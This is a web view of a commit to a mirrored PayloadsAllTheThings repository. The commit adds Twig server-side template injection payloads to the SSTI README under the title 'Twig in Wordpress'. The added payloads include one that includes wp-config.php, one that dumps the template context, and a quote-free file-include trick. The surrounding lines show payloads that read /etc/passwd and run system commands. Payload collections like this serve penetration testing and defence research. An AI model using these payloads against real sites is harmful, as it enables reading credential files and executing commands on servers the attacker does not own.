ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-01-05 11:05:29 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #517 from svewa/master

Browse Source 
Twig in Wordpress
This commit is contained in:
Swissky 2022-07-24 13:22:24 +02:00 committed by GitHub
commit 83c4658ff8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
Server Side Template Injection/README.md
View File

@ -775,6 +775,7 @@ Execute code using SSTI for Slim engine.
{{7*7}} {{7*7}}
{{7*'7'}} would result in 49 {{7*'7'}} would result in 49
{{dump(app)}} {{dump(app)}}
{{dump(_context)}}
{{app.request.server.all|join(',')}} {{app.request.server.all|join(',')}}
``` ```
@ -796,6 +797,7 @@ $output = $twig > render (
```python ```python
"{{'/etc/passwd'|file_excerpt(1,30)}}"@ "{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{include("wp-config.php")}}
``` ```
### Twig - Code execution ### Twig - Code execution
@ -809,6 +811,12 @@ $output = $twig > render (
{{['cat$IFS/etc/passwd']|filter('system')}} {{['cat$IFS/etc/passwd']|filter('system')}}
``` ```
Example injecting values to avoid using quotes for the filename (specify via OFFSET and LENGTH where the payload FILENAME is)
```python
FILENAME{% set var = dump(_context)[OFFSET:LENGTH] %} {{ include(var) }}
```
Example with an email passing FILTER_VALIDATE_EMAIL PHP. Example with an email passing FILTER_VALIDATE_EMAIL PHP.
```powershell ```powershell